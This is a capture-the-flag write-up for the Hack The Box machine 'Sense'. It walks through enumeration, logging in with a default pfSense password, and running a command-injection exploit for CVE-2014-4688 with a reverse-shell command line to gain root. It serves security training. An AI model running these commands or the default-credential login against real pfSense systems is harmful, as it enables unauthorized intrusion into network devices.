# SENSE | 10.10.10.60

## Initial Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.10.60
    
### Open Ports and Their Services

* 80 - HTTP - lighttpd 1.4.35
* 443 - HTTPS - lighttpd 1.4.35

## Services Enumeration

### 80/443 - HTTP(S) - lighttpd 1.4.35

So we just have these two ports open. It is a login page for a pfsense firewall/router:

![](img/pfsense-login.png)

Running gobuster shows several potential directories, but they all redirect to the login page:

![](img/gobuster.png)

The accessible changelog gives me some crucial info that there may be an unpatched vuln:

![](img/changelog.png)

Additionally, there is an `index.html` page that is entirely different from the index.php. It shows that this is actually a BSD system, and there is a link on the page to 'begin installation' and it points to a `.cgi` extension.

![](img/bsd.png)

In the source code of that page is a comment, which I don't fully grasp but I guess it could be a clue:

![](img/bsd-source.png)


There is also `/system-users.txt`, which I left for the end because the dir list I was using did not pick it up (time to switch back from raft to good ol directory-list-2.3):

![](img/creds.png)

That password is not actually "company defaults", I still need to figure out what it is. At least I have a valid username though.

After googling "pfsense default password" I found that "pfsense" is the default password. After changing the username to "rohit" (all lowercase) I was in. And finally, I have the version of pfsense I was looking for: 2.1.3.

![](img/console.png)


Checking searchsploit for this specific version nets a Command Injection exploit, written in python3:

![](img/command-injection.png)

It connects to the host, tries to grab the CSRF token, and then executes a payload, in this case `/bin/sh` and connects back to my machine.


## Foothold via Command Injection vuln - CVE-2014-4688

Even though this exploit is written in Python3, I am getting an error, but I decide to run the exploit anyway. There is a helpful help menu so I am able to figure how to run this exploit:

    ./pfsense-CI.py --rhost 10.10.10.60 --lhost 10.10.14.17 --lport 6969 --username rohit --password pfsense  
    
Once I have a netcat listener running, I execute the script and I have a reverse shell connection:

![](img/root-shell.png)

Wow and I am already root! Was not expecting that.

The flags are where they usually are but I won't bother posting them this time.

## Conclusion

It is amusing to see that this box has more root owns than user owns on HTB - some people evidently did not bother to go into the user rohit's directory to grab the flag.

I was frustrated at the enumeration stage because initially I found no juicy info. I was using a directory list that happened to not include the 'system-users.txt' line. In fact, this kind of thing has happened to me a few times lately. I think I will have to properly tailor my approach to dirbusting based on how old the box is.

Steps taken:

* Long-ass enumeration with gobuster to discover credentials exposed in a text file
* Exploit a command injection vulnerability in pfsense router version 2.1.3 to get a root reverse shell
